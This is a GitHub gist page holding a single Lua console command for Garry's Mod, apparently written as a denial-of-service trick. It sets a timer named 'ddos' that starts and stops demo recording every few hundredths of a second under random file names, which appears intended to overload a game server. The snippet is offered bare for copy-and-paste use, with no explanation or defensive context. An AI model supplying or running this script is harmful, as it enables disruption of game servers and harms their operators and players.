Skip to content

Instantly share code, notes, and snippets.

@ottworks
Created April 26, 2015 06:15
Show Gist options
  • Save ottworks/7f7535d7e1d645d5d761 to your computer and use it in GitHub Desktop.
Save ottworks/7f7535d7e1d645d5d761 to your computer and use it in GitHub Desktop.
lua_run_cl timer.Create("ddos", 0.02, 0, function() RunConsoleCommand("record", math.random()) timer.Simple(0.01, function() RunConsoleCommand("stop") end) end)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment